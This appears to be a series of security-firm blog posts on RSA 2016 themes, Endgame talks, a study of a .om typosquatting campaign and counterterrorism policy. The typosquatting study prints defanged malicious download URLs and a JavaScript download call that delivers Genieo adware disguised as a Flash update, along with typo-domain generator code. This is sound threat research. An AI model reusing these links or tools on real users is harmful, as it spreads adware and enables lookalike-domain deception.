
RSA’s 2016 Message: Don’t Stop Believin’


This year’s RSA Conference found its way into mainstream press and non-technical publications, benefitting from the additional PR generated by the ongoing Apple-FBI dispute.  After hearing several keynote sessions and attending a diverse range of panels covering policy, data science, the dark web, and endpoints, a few common themes nevertheless emerged across these broad topics. In many regards, the themes are less an emphasis on the latest technologies than pleas to alter the status quo and pursue progress in three extremely complex but essential areas, given the incredibly hard mission at hand for those in the security industry. The themes – or rather pleas – span the technical, policy, and organizational aspects of the security industry.

Prevention is Still Imperative: ‘Assume breach’ has become an omnipresent fallback position for many in security. Given the high-profile breaches and increasing sophistication of adversary techniques and campaigns, the probabilistic odds favor the adversary, who only has to be right once, while defenses must stop everything. Like most things, the pendulum swings back and forth, and this is the year of detection and response. Those are obviously important, but it is equally important that we don’t acquiesce to the adversaries and give up on prevention and on making it harder for the bad guys. At a minimum, a renewed emphasis on prevention as part of a larger strategy can help funnel down the breadth of attacks, limiting what gets through and making detection and response both better informed and easier. Although it is an extremely difficult problem set, mitigating exploits and pursuing prevention remains essential to limiting the capabilities of attackers.

Privacy & National Security Can Co-Exist: Just as ‘assume breach’ has become commonplace, so has the notion that there must be a privacy/national security trade-off. This too should not remain acceptable, and the need to protect both was reiterated by government representatives in keynote talks and on panels. In fact, the Federal Government was on a major public relations campaign at RSA. Despite talk of a growing divide between Silicon Valley and Washington, DC – epitomized in the ongoing dispute between Apple and the FBI – audiences this year seemed more welcoming than in previous years to the outreach. Moreover, the outreach is palpable and comes from multiple senior officials, including Attorney General Loretta Lynch, Cyber Command Commander and NSA Director Admiral Michael Rogers, and Secretary of Defense Ashton Carter. As Carter noted, the only way to get to a good solution is by working together. But it isn’t just talk, as Carter pointed to many concrete examples of collaboration, including today’s announcement of the formation of the Defense Innovation Advisory Board, with Eric Schmidt as the chair. Lynch similarly cited successful collaboration with the private sector against the “Gameover Zeus” botnet. In addition to the emphasis on collaboration, the commoditization of data similarly permeated the talks. Data security is a national security imperative – not a trade-off – and requires collaboration and innovation between the communities.

Greater Workforce Inclusion is Possible: Finally, the cybersecurity talent shortage is not only discussed as a given, but is generally assumed to only get worse in the years ahead. However, what remains lost in this dialogue is the industry’s growing gender gap problem. In fact, calling it a gap is a vast understatement, with women comprising just 10% of the workforce. Hopefully, necessity will drive change within the industry, which has little chance of addressing the talent shortage while leaving out half the population. Part of this challenge is the industry’s image problem, perpetuated by Hollywood, but it is much larger than that. For instance, there is yet again a striking lack of women on most of the panels at RSA or interviewed by the press. Only when technical women gain greater visibility will other women realize the vast opportunities available to them in this industry. While there certainly are longer-term solutions to address the pipeline challenge, near-term solutions exist and must be pursued to attract women to the industry.


Each of these three areas falls in the realm of ‘wicked problems’, and reflects a status quo ripe for change and innovation. Technically, given the threat landscape, the odds are against comprehensive prevention, but it doesn’t mean we should throw in the towel. Organizationally, it’s time to break down the artificial divisions between Silicon Valley and DC and refuse to settle for a trade-off between privacy and national security. Finally, the numbers are increasingly bleak for gender diversity in the industry, but it is of paramount importance that this changes. We cannot simply accept the status quo in each of these areas, but rather a concerted effort must be made to innovate technically, organizationally, and culturally to help progress the industry and our security.


Endgame Tech Talks @ RSA: Adding Substance to Form


Last week, Endgame’s malware researchers and data scientists provided a welcome break from the chaos of the convention floor at RSA. Our four talks addressed the need for a multi-stage approach to detection given the sophistication and diversity of attackers, and the complexity of enterprise networks. Since no single detection methodology is fail-proof, multiple comprehensive detection capabilities are required to expedite and optimize the likelihood of detecting known and unknown attacks.

 

With that in mind, our talks began with an overview of Faraday, Endgame’s globally distributed set of customized sensors that listens to activity on the Internet. This talk addressed the ability to differentiate targeted from non-targeted attacks, along with some recent research on the Cisco ASA vulnerability. It was followed by a talk on the five most impactful malicious behaviors: what they are, how they have evolved over time and in sophistication, and how to counter them. Next, our data science talk covered the use of machine learning to automate malware classification and contextualize it by determining capabilities. We concluded with the essential role of stealth in helping defenders evade detection by adversaries. Together, our talks presented four unique aspects of our multi-stage approach to detection, which feed into the Endgame cyber operations platform and inform our hunting capabilities.

 

Take a look for yourself at each of these unique presentations and diverse approaches to detection.

Extracting the Malware Signal from the Internet Noise: Andrew Morris

Dynamic Detection of Malicious Behavior: Amanda Rousseau

Machine Learning for Malware Classification and Clustering: Phil Roth

Worst-Case Scenario: Being Detected without Knowing You’re Detected: Braden Preston

 

What Do Oman, House of Cards, and Typosquatting Have in Common? The .om Domain and the Dangers of Typosquatting


House of Cards Season 4 debuted on Netflix this past weekend, much to the joy of millions of fans, including many Endgamers.  One particular Endgamer made an innocent, but potentially damaging mistake.  He mistyped the domain “www.netflix.com” as “netflix.om” in his browser, accidentally dropping the “c” in “.com”.  He did not get a DNS resolution error, which would have indicated the domain he typed doesn’t exist.  Instead, due to the registration of “netflix.om” by a malicious actor, the domain resolved successfully.  His browser was immediately redirected several times, and eventually landed on a “Flash Updater” page with all the usual annoying (and to an untrained user, terrifying) scareware pop-ups. Luckily, the Endgamer recognized danger and retreated swiftly, avoiding harm.

[Image: the scareware “Flash Updater” page reached from netflix.om]

This led to many questions about this particular flavor of typosquatting effort.  Was this an isolated case or was it only a sample of a more prevalent and dangerous campaign?  Not only is it a potentially common error on an extremely popular site, but our hypothesis was that it is unlikely limited to only Netflix. Our Malware Research and Threat Intelligence team dug deeper.  We wanted to find out how many other huge Internet properties are actively being targeted with .om typosquatting, as well as how many .om sites corresponding to popular properties are unregistered and thus vulnerable.  Finally, we wanted to know how easy it is to get a .om domain.  We were aware of abuse of other country code Top Level Domains (ccTLDs), including .co and .cm, but weren’t aware of .om abuse.

Our research revealed that there is at least one major .om typosquatting campaign targeting many of the world’s largest organizations.  It has already targeted over 300 well-known organizations, including Netflix, and given the spike in activity in February, is likely to only attempt to expand its reach in March. While the typosquatting campaign currently is a relatively unsophisticated effort, this kind of opportunistic behavior is typical of typosquatting and watering hole campaigns.  Our research also indicates that .om domains associated with the vast majority of major brands may be unregistered.  It does not appear that companies are widely including the .om in their typosquatting mitigation strategies.  We strongly recommend doing so.

 

What is typosquatting and why is it dangerous?

Typosquatting is a well-known security problem.  In a typosquatting campaign, a malicious actor will target one or more well-known websites or brands and register domains very similar to the legitimate domain.  Techniques often include doubling characters (“googgle.com”), adjacent keys (“googlw.com”), and letter swapping (“googel.com”).  Typosquatting easily solves one of the biggest hurdles for these bad actors: delivery of the malicious content.  In typosquatting, users just show up.
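The three typo classes named above can be sketched as a small generator. This is a minimal illustration in Python, not an exhaustive typosquatting toolkit:

```python
# Rows of a QWERTY keyboard, used to find keys adjacent to each letter.
QWERTY_ROWS = ["qwertyuiop", "asdfghjkl", "zxcvbnm"]

def adjacent_keys(ch):
    """Return the characters immediately left/right of ch on its QWERTY row."""
    for row in QWERTY_ROWS:
        i = row.find(ch)
        if i != -1:
            return [row[j] for j in (i - 1, i + 1) if 0 <= j < len(row)]
    return []

def typo_variants(name):
    """Generate doubled-character, adjacent-key, and letter-swap typos."""
    variants = set()
    for i, ch in enumerate(name):
        variants.add(name[:i] + ch + name[i:])            # doubling: googgle
        for near in adjacent_keys(ch):                    # adjacent key: googlw
            variants.add(name[:i] + near + name[i + 1:])
        if i + 1 < len(name):                             # swapping: googel
            variants.add(name[:i] + name[i + 1] + ch + name[i + 2:])
    variants.discard(name)  # the correct spelling is not a typo
    return variants
```

Running `typo_variants("google")` yields the examples above, among others: "googgle", "googlw", and "googel".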

If the bad actor does his job well, a significant number of users mistype the intended domain in the expected way, and those unfortunate enough to hit “Enter” will unintentionally head down a dark road on the web.  In some cases, effects can be relatively mild, such as: the user is redirected to objectionable material; the user is presented items for purchase from storefronts of questionable repute; or the user sees content that unfavorably portrays the intended brand or site. Effects can also be much worse.  The malicious actor can spoof a real site to harvest login credentials, place backdoors on a system, install ransomware, or really anything else of his choosing.

 

Typosquatting and TLDs

Our discovery of the malicious netflix.om led us to focus our research on typosquatting via registrations of domains using alternate TLDs.  As of March 9, there are 1247 TLDs on the Internet according to the Internet Corporation for Assigned Names and Numbers (ICANN), the non-profit organization responsible for handling the overall Internet namespace.  This includes commonly seen TLDs like .com, .org, and .gov that are familiar to most Internet users. There are 251 ccTLDs representing nearly every country on Earth (many countries have more than one ccTLD).  Beyond this, since 2013 ICANN has approved hundreds of new TLDs such as .guru, .tech, .florist, and many more.  This is a huge set of alternate TLDs which could be abused.

The most interesting set of TLDs for typosquatters are those that are likely to be mistyped.  We have seen some research on typosquatting of .co and .cm, the ccTLDs for Colombia and Cameroon, respectively.  Similarly, as we discovered with the Netflix example, the ccTLD assigned to the country of Oman, .om, is a prime candidate.  Simply drop the “c” in “.com” and you’re there.  An alternative method we also considered is flipping the “c” and the “.”. For example, “google.com” becomes “googlec.om”.  
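Both .om confusions can be derived mechanically from a brand's legitimate .com domain, as in this short sketch:

```python
def om_candidates(domain):
    """Given a legitimate .com domain, return the two .om typo forms
    described above: dropping the 'c' (netflix.om) and shifting the
    dot one character left (googlec.om)."""
    if not domain.endswith(".com"):
        raise ValueError("expected a .com domain")
    brand = domain[: -len(".com")]
    return [brand + ".om", brand + "c.om"]
```

For example, `om_candidates("netflix.com")` returns `["netflix.om", "netflixc.om"]`.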

 

How many .om’s are registered and possibly malicious?

We began our research of .om abuse by attempting to determine how many .om domains are associated with popular sites, who is registering these domains, and what is hosted at those sites.  To do this, we went through the 5,000 most popular domains globally and checked whether each brand had an associated <brand>.om or <brand>c.om that resolved.  We discovered 334 domains that meet this criteria and are currently pointing to active sites.  There may be others that are registered, but are currently down or are in the process of being purchased. We contacted the most heavily clustered ISPs and shared information pertaining to the malicious domains before publishing.
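A minimal sketch of that survey loop, assuming a hypothetical brand list; DNS resolution uses the standard library, and the resolver is injectable so the logic can be exercised without network access:

```python
import socket

def resolves(domain, timeout=3.0):
    """Return True if the domain currently resolves in DNS."""
    socket.setdefaulttimeout(timeout)
    try:
        socket.gethostbyname(domain)
        return True
    except socket.gaierror:
        return False

def survey(brands, resolver=resolves):
    """For each brand, report which .om typo forms currently resolve."""
    hits = {}
    for brand in brands:
        candidates = [f"{brand}.om", f"{brand}c.om"]
        live = [d for d in candidates if resolver(d)]
        if live:
            hits[brand] = live
    return hits
```

A real run would feed in the top-5,000 brand names and rate-limit the queries; the shape of the output is a map from brand to its live typo domains.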

Our next step was looking at registration information via WHOIS services.  We wanted to know if there were blocks of domains with the same registration information and timing of registration, and whether any appeared to have contact information associated with the legitimate property. During our research, we discovered that only fifteen of the .om domains were managed by the rightful owner or a brand protection organization. The entire list of these 15 domains can be found at the end of this post. ccTLDs can be challenging to analyze because WHOIS services can be quite restrictive in access to registrant data. Malicious actors are aware of these limitations and therefore often use such ccTLDs to hinder attribution.  The .om ccTLD allowed for some data access. Interestingly, we were able to identify several actors who registered the majority of these domains in clusters, as listed in the table below (295 of the total 334). The entire list of suspicious domains can be found here.
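The registrant clustering can be sketched as a small WHOIS-text parser. Note that WHOIS field labels vary by registry, so the "Registrant Name" label below is an assumption for illustration, not the .om registry's exact output format:

```python
import re
from collections import defaultdict

def parse_registrant(whois_text):
    """Pull the registrant name out of raw WHOIS output.
    'Registrant Name' is one common label; real registries differ."""
    m = re.search(r"Registrant Name:\s*(.+)", whois_text)
    return m.group(1).strip() if m else None

def cluster_by_registrant(records):
    """records: {domain: raw_whois_text} -> {registrant: [domains]}."""
    clusters = defaultdict(list)
    for domain, text in records.items():
        name = parse_registrant(text) or "<unknown>"
        clusters[name].append(domain)
    return dict(clusters)
```

Feeding every suspicious domain's WHOIS record through this produces exactly the kind of registrant clusters shown in the table.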

[Table: registrant clusters accounting for 295 of the 334 suspicious .om domains]

It is worth noting that we have no reason to believe that these identities are associated with the malicious campaign.  Registrant names can be easily spoofed, can be an alias, or could be filled in as an artifact of the registration process; for example, an identity associated with domain approval.  Attempting any attribution of this typosquatting campaign is beyond the scope of this research.

We then sought to understand whether there were any interesting patterns in registrations.  Given the clustering in registrants, we expected to see those identities cluster in terms of time of registration.  This could imply a fully scoped malicious campaign wherein the malicious infrastructure was staged at a given time.  As the following graph demonstrates, we saw spikes.  The February 2016 spike, for example, is due in part to a large number of Ahmed Al Amri registrations on February 25th.  It is possible that this could be the result of a batch of domains being approved at that time (see the section on registering a domain for information on a waiting period).
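Bucketing registration dates by month makes spikes like the February one easy to surface. The records below are illustrative stand-ins, not our actual dataset:

```python
from collections import Counter
from datetime import date

def monthly_counts(registrations):
    """registrations: iterable of (domain, registration_date) pairs.
    Returns a Counter of registrations per (year, month) bucket."""
    return Counter((d.year, d.month) for _, d in registrations)

# Illustrative sample data only.
regs = [
    ("netflix.om", date(2016, 2, 25)),
    ("youtubec.om", date(2016, 2, 25)),
    ("gmail.om", date(2015, 11, 3)),
]
by_month = monthly_counts(regs)
# by_month.most_common() surfaces the spike months first.
```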

[Chart: .om registrations over time, with a spike in February 2016]

We next determined where .om domains are being hosted.  As with registration information, we noted clustering here as well.  The 334 .om sites related to well-known Internet properties are hosted on 15 different hosting providers.  As a sampling, 111 of the domains (including netflix.om) are pointing at IPs associated with Tiggee LLC, a US-based hosting provider. Casablanca, a Czech hosting provider, and Choopa LLC, a hosting provider in New Jersey, account for other large chunks. Unsurprisingly, many point to the same IP address within a given provider.  For example, the 111 domains on Tiggee point to only four IP addresses hosted at that provider, and from there a series of redirections take place.  On top of the previous evidence, this tight clustering in where the domains are hosted gives us very clear evidence that the typosquatted .om domains are grouped into campaigns.

We wanted to see what software stack is running on the servers hosting .om sites, and used Shodan to do so.  Due to our focus on netflix.om, we looked most closely at the servers on Tiggee.  Unsurprisingly, the software stack on these servers was uniform.  Many of the machines serving up these domains have severe unpatched vulnerabilities, including some which could provide arbitrary remote access. That is, these hosts could easily be exploited by other actors to serve up alternate (possibly worse) malicious content than what’s currently being served.

Having convinced ourselves that there is at least one typosquatting campaign underway, we wanted to identify how much traffic the malicious sites receive.  In other words, how common is the targeted typo?  To answer this question, we looked at our sources of passive DNS data.  Passive DNS provides an analyst with information about DNS activity.  We see that the actors behind this typosquatting attack have been quite successful. There are at least thousands of queries per day to the malicious .om domains from different recursive DNS resolvers across the world.  This is the lower bound on the amount of activity, given caching and the limited scope of passive DNS sensors we have access to.  The footprint is global, as displayed in the diagram below.  

[Map: global distribution of DNS queries to the malicious .om domains]

It is worth restating a point from above.  The vast majority of .om domains associated with brands in the top 5,000 do not currently resolve to active sites.  We don’t have access to the .om zone file to know for sure whether this means they aren’t registered, but we’d assume that a significant chunk probably are not registered.  Most active .om sites associated with popular brands appear to be part of malicious campaigns.  It’s concerning to us that typosquatters could scoop up many more popular domain names in the .om ccTLD, exponentially increasing the impact.

In our experience, typosquatting for the purpose of content delivery is mostly the realm of cyber criminals and questionable ad networks.  APTs have been seen copying domains for visual similarity to hide C2 and exfil – for example, the we11point.com domain being used as infrastructure in the Anthem attack.  We could also see typosquatting increasingly used by determined adversaries, much like watering holes, to gain access.  The 2013 attack on a popular iOS developer site that led to the compromise of Facebook, Apple, and many others is a good example of the potential implications of watering holes. A “.om” domain could be bought and used to catch a small number of mistakes over time from targeted organizations, enabling an actor to drop backdoors into a targeted network.

 

What happens when a user visits one of these sites?

Having understood the scope of this problem, we wanted to understand what takes place when a user visits one of these malicious .om sites.  We also wanted to look at the content being served across the different domains in an attempt to solidify our understanding of how activity is grouped within campaigns.

As was the case with the original netflix.om domain we initially encountered, a majority of the other typosquatted domains appeared to exhibit the telltale signs and behavior of adware redirection sites. Accessing one of these sites tends to lead the user’s browser to a few different web pages in a very short period of time, with the ultimate destination having content that may not even be relevant to the URI accessed in the first place. The redirections are in place for a few different reasons:

  1. The original URI can be made to appear somewhat legitimate, obscuring the path users will be forced to go down upon access.
  2. The malicious actors can redirect the users to targeted platform-specific and / or location-specific content that may entice a naïve user to continue their journey further down the rabbit hole.
  3. The actors can change the destination web pages in an instant by modifying one or more of the redirect pages, thus allowing for easy pivoting to new pages or servers much like an incredibly frustrating game of Whack-A-Mole.
  4. Tracking cookies can be generated along the way to the ultimate destination and placed within the user’s browser cache to surreptitiously monitor their behavior and provide further means for the actors to monetize a user’s unfortunate trip to their site.

Regardless of the relevance of the content, the destination web page will almost assuredly be riddled with advertisements, surveys to complete for free electronics, or scareware tactics to entice users to download and execute an anti-virus suite that leads to further headaches and intrusive advertising. The goal of these pages is simply to generate as much advertising revenue as possible for the bad actors while trying to keep naïve users engaged and / or scared in order to keep them clicking more links and prolonging their sessions.
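The hop-by-hop behavior described above can be examined with a small redirect-chain walker. The fetcher is injectable (any callable mapping a URL to a status code and Location header) so the same logic works with a real HTTP client or canned data; the domains in the usage note are hypothetical:

```python
REDIRECT_STATUSES = {301, 302, 303, 307, 308}

def follow_redirects(fetch, url, max_hops=10):
    """Walk a redirect chain, returning every URL visited in order.
    `fetch` maps a URL to (status_code, location_or_None)."""
    chain = [url]
    for _ in range(max_hops):
        status, location = fetch(url)
        if status not in REDIRECT_STATUSES or location is None:
            break
        url = location
        chain.append(url)
    return chain
```

Recording these chains across all 334 domains is what let us compare redirection techniques between hosting providers.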

We quickly discovered that there was a limited set of redirection techniques and adware content that were consistently served up by the malicious .om domains. Due to the similarities involved (if not exact matches) in the HTML and JavaScript that was collected, we were able to divide the domains into distinct categories according to the different hosting providers.  The content served at domains hosted at the same provider usually stayed within a small set (one or two) of redirection techniques or adware content. The maximum number of redirection techniques we saw on any host was five.  

After completing the scraping and tallying up the various techniques and adware content, there was one grouping of data in particular that stuck out. The .om domains hosted at Tiggee and Casablanca served up the same or similar content in several instances, which provides evidence that one actor is likely operating on those two providers.  

The following demonstrates some of the redirects on a couple of the .om sites.  

[Image: example redirect chains observed on typosquatted .om sites]

 

Targeting of Mac users with malware

The redirect / adware pages hosted at the typosquatted domains were very annoying and possibly alarming to users, but we did not note any malware being dropped or any prompts to install malware, in contrast to the Endgamer’s experience over the weekend.  We theorized that the sites may be performing operating system and/or user agent detection.  Based on the user’s configuration, the sites would serve advertisements or adware catered to his or her platform.  This is a common tactic for malicious actors.

We switched from using a Windows virtual machine with varying browser configurations to an OS X virtual machine with Firefox.  Upon doing this, we were able to reach the same page seen by the Endgamer earlier in the week, capture malware, and perform our analysis.
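Probing the same URL under different browser identities is how this kind of cloaking is exposed. A sketch of building such probes with the standard library; the User-Agent strings are illustrative, and a real survey would rotate many more:

```python
import urllib.request

# Illustrative User-Agent strings for the platforms we impersonated.
USER_AGENTS = {
    "windows-chrome": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36",
    "osx-firefox": ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:44.0) "
                    "Gecko/20100101 Firefox/44.0"),
}

def build_probe(url, platform):
    """Build a request that impersonates the given platform's browser.
    The response bodies can then be diffed across platforms to detect
    OS- or browser-specific payloads."""
    return urllib.request.Request(
        url, headers={"User-Agent": USER_AGENTS[platform]})
```

Comparing the content returned for "windows-chrome" versus "osx-firefox" probes is what surfaced the Mac-only malware path.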

[Image: fake Adobe Flash Player download page served to OS X users]

When clicked, the “Download” and “Install” buttons call a JavaScript function to initiate the download and produce a popup within the browser: 

 

javascript:downloadEXEWithName('
 hxxp://ttb.newmysoftb[.]com/
 download/request/561257515f1c1ec447000000/
 LVw2a59i',%20'LVw2a59i',%20'FlashPlayer.exe')

[Image: browser download popup triggered by downloadEXEWithName]

Despite the name, the downloadEXEWithName function does not result in a Windows executable being downloaded. The function builds a unique URI for downloading the adware:

hxxp://ttb.newmysoftb[.]com/download/
request/561257515f1c1ec447000000/
LVw2a59i?__tc=1457627771.679&lpsl=a8604c33f478be1581e95cfe73ed6147&expire=1457713110&slp=www.getfiledow.com&source=netflix.om&c=0.0069&fileName=FlashPlayer
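The query string of that second URI carries the lure's working parameters (the source typo domain, the advertised file name, and tracking values), which standard URL parsing pulls apart; the defanged host is refanged here purely for parsing:

```python
from urllib.parse import urlsplit, parse_qs

# The URI from above, refanged for parsing purposes only.
uri = ("http://ttb.newmysoftb.com/download/request/561257515f1c1ec447000000/"
       "LVw2a59i?__tc=1457627771.679&lpsl=a8604c33f478be1581e95cfe73ed6147"
       "&expire=1457713110&slp=www.getfiledow.com&source=netflix.om"
       "&c=0.0069&fileName=FlashPlayer")

parts = urlsplit(uri)
params = parse_qs(parts.query)
# params["source"] identifies which typo domain referred the victim;
# params["fileName"] names the masquerading payload.
```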

 

When this second URI is accessed, it initiates another redirect to an OS X DMG file hosted in an Amazon AWS S3 bucket:

hxxps://s3.amazonaws[.]com/hm-ftp/prod/
1000012/80801124/162/installer/
default/AdobeFlashPlayer.dmg
?postbackURL=http://platform1.admobe.com/p/ic.php&postbackData=s|YXAZoZX...

The download was then determined to be Genieo adware, a common OS X malware / adware family. Genieo typically infiltrates the user’s system by posing as an Adobe Flash update and drops an OS X DMG container, as was the case in our experience. Genieo then entrenches itself on the host by installing itself as an extension in various supported browsers (Chrome, Firefox, Safari).

The variant in this case appears to function similarly to standard Genieo variants in that it installs browser hijacking extensions in Chrome, Firefox, and Safari:

[Image: Genieo browser-hijacking extensions installed in Chrome, Firefox, and Safari]

The Firefox extension will attempt to alter the browser homepage to hxxp://www.hmining[.]mobi/homepage, while the Safari extension contains hardcoded references to the S3 bucket from which the original DMG was downloaded: hxxp://s3.amazonaws[.]com/hm-ftp/prod/%@/offers/%04d/%@. As is typical with Genieo variants and other browser hijacking adware, the extensions contain extensive capabilities for modifying the configuration of each of the respective browsers in order to provide targeted advertising and generate ad revenue for the adware developers and distributors, much to the chagrin of their unfortunate victims.

Because it’s a fairly well-researched piece of malware, we will not go further in depth here.  For more information on Genieo, please see: http://www.thesafemac.com/genieo-adware-downloaded-through-fake-flash-updates.

 

Buying a .om domain

As detailed above, the majority of .om domains for top Internet sites are probably unregistered, and only a small number appear to be controlled by the legitimate brand.  In investigating the .om ccTLD, we found conflicting information about authorized usage of the .om ccTLD.  Some sources indicate that this ccTLD is used by “Omani Government and official parties,” while other sources indicate that .om is open for all to register and has no auxiliary requirements.  Obviously some very questionable .om domains are in the wild.  We decided to register a domain and see what would happen.

We identified several websites that claimed to sell .om domains.  We chose one, which offered a domain for $269 per year.  We registered with obviously bogus information (similar to “John Smith”, “123 1st St”, “(111)-111-1111”) and made the purchase.  The only identity verification requirement was clicking a verification link sent to a legitimate email address, which had no relation to the domain being acquired.  We were informed that we now owned the domain, but were subject to a two month waiting period.  It was not specified what would occur during this two month period.  But wait!  The website went on to offer what seemed to be an expedited process for an additional $335.  The same company even offered to assist with establishing a “new official business” in Oman.
[Image: registrar offer of an expedited .om registration process for an additional $335]

We chose to initially register without any add-ons and reach out later to request the expedited process.  Within an hour of requesting expedited service, a representative from the registrar contacted us.  At this point, the representative asked us for proof that we were associated with the brand in question.  He was extremely helpful and willing to support us, but with our information being so obviously bogus, we hit a snag.  There did appear to be some concern with proving that we were real, at least in this case.  As a test, we registered a second .om domain with legitimate-looking contact details and asked to expedite it at the time of initial purchase.  As of this writing, we have not received any inquiries, but the second expedited purchase remains in process.  We don’t know why we haven’t received the same questions about documentation, but assume it’s because on the surface the information looks much more legitimate.

This leaves some open questions.  We did experience a verification step in the expedited process.  We do not know whether the same verification would have been requested during the two month waiting period had we not expedited.  As we detailed, hundreds of malicious domains clearly not associated with the targeted brand have recently been registered.  It is highly unlikely that purchasers had proof of ownership.  Bottom line, we do not know how all of these domains were approved for registration, but .om is clearly not just for official Omani government use. In fact, as we demonstrated, for a reasonable price you too can own a .om domain.

 

Conclusion

Based on our research, this campaign has much broader implications and relevance for a variety of organizations, not just Netflix.  It may not be well known that .om domains are available for purchase.  The vast majority of registered .om domains corresponding to popular brands are malicious, according to our research, and they are receiving a non-trivial amount of traffic.  Equally concerning, the .om equivalents of many popular sites remain unregistered and therefore vulnerable.

Most large companies already have a typosquatting mitigation strategy.  Companies identify, register, and control likely domains their customers may accidentally enter.  It’s relatively easy to identify and purchase candidate domains using tools such as Domain Tools’ Domain Typo Finder.  We recommend that companies prioritize .om registration to protect their reputation, and block known-malicious .om domains to protect their enterprise.
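One way a defender might flag .om lookalikes of protected brands in, say, proxy or DNS logs. This is a sketch covering only the two typo forms discussed here, with a hypothetical brand list:

```python
def matches_protected_brand(domain, brands):
    """Return the protected brand a .om domain appears to impersonate,
    or None. Covers the two forms discussed: brand.om and brandc.om."""
    if not domain.endswith(".om"):
        return None
    label = domain[: -len(".om")]
    for brand in brands:
        if label in (brand, brand + "c"):
            return brand
    return None
```

Applied to an outbound DNS log, any non-None hit is a candidate for blocking or at least alerting.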

The effects in this case were relatively mild, with the installation of common adware the worst-case scenario for an unfortunate user.  But that does not mean this attack vector should be taken lightly.  The malicious actors could just as easily have taken more damaging actions, such as installing ransomware, conscripting victims into a botnet, or staging additional malware on victim machines.  Furthermore, typosquatting techniques could be used by more persistent and patient adversaries to gain remote access to targeted victims.

Companies - especially high profile companies - should expand their typosquatting mitigation strategies to additionally focus on TLDs if they aren’t already. As we have seen, the .om typosquatting impacts many high profile companies whose customers are now vulnerable to the same deception that our colleague discovered when attempting to binge watch this season’s House of Cards.

 

Update 3/16/16: Since the initial publication, a large percentage of the .om websites have been updated to serve only ad content instead of serving adware/malware links to Mac users. The campaign remains concerning, as the identified sites remain active and could be switched back to serving more malicious content at any time.  The reasons for this change are unknown.

 

Update 3/25/16: Of the 319 malicious .om domains we originally reported on 11 March, 292 have been deleted or had their DNS records removed. Updates to the "whois" server indicate that the domain status was revoked by the registrar due to "Violating the terms of registration as per the registry-registrar agreement". The original, complete list of domains that appeared suspect can be found here. The updated list of domains that remain active since publishing our research can be found here.

 

List of 15 .om domains that appear legitimate

nextdirect.om

hotwire.om

vmall.om

tripadvisor.om

hyatt.om

entrepreneur.om

bbc.om

icloud.om

marriott.om

twitter.om

lego.om

panasonic.om

tv.om

papajohns.om

pizzahut.om

Counterterrorism-Cybersecurity Strategy Over Soundbites


Counterterrorism is not easy.

Last week’s terrorist attacks in Belgium served as yet another horrific reminder of the complexity and intractability of counterterrorism (CT). Unfortunately, just as occurred following last year’s Paris and San Bernardino attacks, there is a tendency in the media and among politicians to call for easy but archaic solutions, like physical and virtual walls, that are ill-equipped to handle the complex elements of CT.

Here is what we all—angry politicians and talking heads alike—do need to understand: As George Kennan noted while discussing the Vietnam War, strategy cannot be simplified to sound bites, and there are dangers inherent in foreign policy by bumper sticker. Given the complexities of terrorism and technological diffusion, this is just as true today as it was fifty years ago. Continuing to instigate a string of policy proposals that run counter to democratic ideals and the free flow of information, in order to provide an easy solution to a problem that doesn’t have one, will fail to achieve stronger security. As these CT challenges and responses are inextricably linked with cybersecurity, an integrated socio-technical CT-cybersecurity strategy, while a less digestible point for pundits, is much more likely to succeed.

The Counterterrorism Analytical Framework in the Counterterrorism Joint Publication 3-26 lists nine critical factors or centers of gravity of terrorist networks: leadership, safe haven, finance, communication, movement, intelligence, weapons, personnel, and ideology. Every factor relies heavily on the Internet, from the research and distribution of weapons to money transfers and the spread of ideology. Social media has garnered the most attention, especially with regard to recruitment, while the Apple-FBI case has elevated the encryption debate and concerns over security-privacy trade-offs. Further, terrorist groups rely on digital technologies as instruments of power across the spectrum of all critical factors. Members of the Syrian Electronic Army are facing criminal charges in the US for online criminal activity and hacking, while groups like al-Shabaab in Somalia rely on mobile money transfers for financial transactions and funding. In short, technology supports all critical factors of terrorist networks.

Given the diverse and nuanced use of digital technologies by terrorist groups, it is disheartening that many reactive policy proposals fail to understand how intertwined technology and CT are on and offline, or that there are many parallels between CT proposals in the physical and virtual world. The most worrisome trend is the increased rhetoric demanding the closing of borders, or withdrawal from regional collaborative institutions such as the European Union or NATO. In the geopolitical realm, this push for domestic isolation would set back decades’ worth of gains in the economic and social realms, not to mention these institutions’ pacifying impact on interstate relations. Simultaneously, the misperception that information isolation is possible has led to a patchwork of proposed or instituted policies that are segmenting the free flow of information. The French proposal to ban Tor and block public Wi-Fi, and discussions of blocking the Internet, are just two recent examples of how CT responses fail to take into account the negative externalities of such policies as well as the technical realities of the modern era. There have also been proposals to regulate Bitcoin and virtual currencies, despite the spread of technologies that obfuscate money trails, or Europol’s findings that ISIS does not use Bitcoin when planning attacks.

This regression inward is accompanied by calls to build both physical and virtual walls to combat terrorism. While this may have previously worked to varying degrees, it has at times had unanticipated consequences (e.g. the Maginot Line), and simply doesn’t work today. Just as a physical wall can be circumvented, closing parts of the Internet is outdated and ineffective. Moreover, as the most recent attacks in Europe and the U.S. indicate, building walls completely ignores homegrown terrorism. Similarly, any fragmentation of or barrier to the Internet is ineffective against insider threats, which have had the biggest impact on national security.

CT and cyber experts are rarely one and the same, but these two areas are increasingly interconnected, with CT driving many of the policy and public debates in the cyber realm. Government policy representatives recently met with Silicon Valley tech leaders to discuss CT, seeking assistance in limiting the role of social media as a recruitment and propaganda tool. While the outreach to the tech community is a good first step, this meeting would have benefitted from the participation of CT experts. Policies that focus solely on the technological aspect of CT will address the means used, not the root causes of terrorism, and will discount insights on the social, economic, and political causes of terrorism. The whack-a-mole approach to CT by experts in the tech sector has proven ineffective, but unfortunately that is the current state of CT policies in the digital domain, as every suspended Twitter or Facebook account is easily replaced with many more new ones. To date, most of the CT proposals that pertain to the Internet fail to understand the organizational structures of terrorist networks and the various critical factors that are necessary for group survival.

Similarly, most CT experts’ proposed policies fail to take into account modern technical realities. Many of their proposed solutions actually hurt those who use the Internet normally and daily, while having no impact on bad behavior. Encryption restrictions, Wassenaar export controls, banning Tor, cutting off the Internet, and so forth—all of this hurts the average citizen and civil rights movements and has no impact on criminal or terrorist activity. Unfortunately, with the recurrence of high profile terrorist attacks, the immediate, reactionary responses are too often misaligned with root causes and technical realities.

Too often, politicians seek quick sound bites to demonstrate they are tough on terror, but these have little alignment with the threat and technology. It’s time to move beyond bumper sticker CT and cybersecurity policies, and pursue strategies that take into account both the social and technical complexities of the modern era.

*This post was originally featured on New America weekly

When Unicorns are the Majority: The power of positivity when it comes to diversity in cybersecurity


